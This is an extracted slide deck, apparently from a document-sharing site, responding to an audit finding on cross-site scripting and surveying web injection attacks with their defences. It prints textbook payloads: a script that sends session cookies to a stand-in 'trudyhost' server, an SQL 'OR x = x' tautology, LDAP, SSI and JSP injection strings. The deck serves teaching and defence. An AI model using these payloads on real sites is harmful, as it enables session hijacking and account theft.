You are on page 1of 34

Web Audit Vulnerability

crosscross-site scripting (XSS) concerns by Ron Widitz

Business Problem
   

Independent security audit Regulatory compliance XSS issue raised Must provide a response

Audit Response


Either:
Prove issue to be a non-problem nonor

Describe actions to take

Resolution Steps
    

Investigate security concerns Restate as IT problem(s) Determine solution(s) Provide audit response Mitigate risk

Investigation
   

Define cross-site scripting (XSS) crossExamine how auditors applied Identify risks Research preliminary solutions

crosscross-site scripting
 

 

Attacker goal: their code into browser XSS forces a website to execute malicious code in browser Browser user is the intended victim Why? Account hijacking, keystroke recording, intranet hacking, theft

XSS concept

Auditor finding
 

Freeform edit box Message to Customer Service

XSS types
     

Immediate reflection : phishing DOMDOM-based : 95 JavaScript methods Redirection : header, meta, dynamic Multimedia : Flash, QT, PDF scripts CrossCross-Site Request Forgery (CSRF) others
(e.g. non-persistent search box) non-

Risks
    

XSS abuses render engines or plug-ins plugSteal browser cookies Steal session info for replay attack Malware or bot installation Redirect or phishing attempt

Our actual risk


   

Currently, none. Edit box info viewed in thick client DHTML or JavaScript needs browser Our thick client is Java Swing-based Swing-

Planned Audit Response


    

Could indicate no audit problem Might have future impact Address through dev standards Consider application firewall Widen problem scope to include all user agent injection tactics

More on Web Attacks


     

Cross Site Scripting SQL Injection XPATH Injection LDAP Injection SSI (server side inclusion) Injection JSP (Java server pages) Injection

Artifacts


For each injection issue:


Vulnerability description documented Preventative coding technique

Discuss with App Dev teams


Publish and socialize direction Include in peer reviews/code walkthroughs Set deadlines for full incorporation

Communicate with auditors

Cross Site Scripting Example 1


 

Trudy posts the following JavaScript on a message board: <SCRIPT> document.location='http://trudyhost/cgidocument.location='http://trudyhost/cgibin/ stealcookie.cgi?'+document.cookie </SCRIPT> When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Cross Site Scripting Example 2


 

Trudy sends a link to the following URL to Bob that will take him to a personalized page: http://host/personalizedpage.php?username=<scri pt>document.location='http://trudyhost/cgipt>document.location='http://trudyhost/cgibin/stealcookie.cgi?'+document.cookie</script> A page is returned that contains the malicious script instead of the username Bob, and Bob s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

Cross Site Scripting Detection




A client usually is not supposed to send scripts to servers


If the server receives <SCRIPT> or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred

A sanitized script could look like &ls;SCRIPT&gt;

SQL Injection Example




Trudy accesses Bob s website; in which he does not validate input on his sign in form Runs a SQL statement like the following: SELECT * from Accounts where username = USER_NAME and password = USER_PASS ; In the password field, she types as her password: X OR x = x Manipulates the server into running the following SQL command: SELECT * from Accounts where username = USER_NAME and password= X OR x = x ; Selects all account information

SQL Injection Detection




To detect and prevent this at Bob s location


Log any traffic from Trudy to Bob containing form data containing a quotation mark Match any outgoing SQL statements from Bob s web server to his database server and verify that the quotation marks Trudy supplied were escaped If they weren t, take action

XPATH Injection Example


 

Similar to SQL injection Bob has a form that does not sanitize useruserprovided input before using it as part of an XPATH query::
string(//user[name/text()= USER_NAME' and password/text()= USER_PASS']/account/text())

Trudy again can provide the following password to change the statement s logic:
X OR x = x The statement thus selects the first account

LDAP Injection Example




Server using LDAP for authentication


User name initialized, but then uses unchecked user input to create a query

filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry  Attacker can exploit using special characters http://example/ldapsearch.asp?user=*

LDAP Injection Detection




Detection is based off of usage of special LDAP characters


System monitors input for special characters Either scrubs incoming input or watches for unescaped output passed to database server

Detection approach is blackbox

SSI Injection Example


Bob has his server configured to use ServerServerSide Includes  Trudy passes input with an SSI embedded <!--#INCLUDE VIRTUAL="/web.config"--> <!--#INCLUDE VIRTUAL="/web.config"-->  SSI inserts malicious code into normal webpages upon next request  Future legitimate users get content containing the tainted code included by the SSI


SSI Injection Detection




Bob s system needs SSI enabled, so he uses our system on local servers
SSI code can be detected by its specific format


HTML comment (<!-- -->) containing a command (<!-- -->)

SSI commands can be stripped on ingress Can also deny outgoing packets that do not include SSI as inputted (means successful execution)


Detection approach is blackbox

JSP Injection Example


 

Similar to SSI injection Bob has a portal server configured to use dynamic code for templates Trudy passes input with an embedded <jsp:include http://bad.com/1.jsp > malicious code inserted into webpage

JSP Injection Prevention


    

Prefer static include <%include > Don t allow file inclusion outside of server via Java2 Security policies Firewall rules to prevent outbound requests from server Input validation coding Choose portal software not requiring dynamic includes or code execution

Defense Approaches


Web firewall/IDS
ModSecurity for Apache Commercial: SecureSphere from Impervia

Static code analysis


Open source: Nikto Commercial:
 

Acutenix Web Vulnerability Scanner N-stalker

Education on good coding


HTML encoding on input (server-side) (serverInput validation/filtering

Q&A


Suggestions?

Backup Slides

user agent injection


     

Stored HTTP Response Splitting SQL Injection XML Injection JSP Code Injection LDAP Injection

Approaches
 

  

Application firewall HTML encoding on input (server(server-side) Input validation/filtering Coding techniques with output Session key enforced to prevent CSRF

XPATH Injection Detection




Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Detection approach is blackbox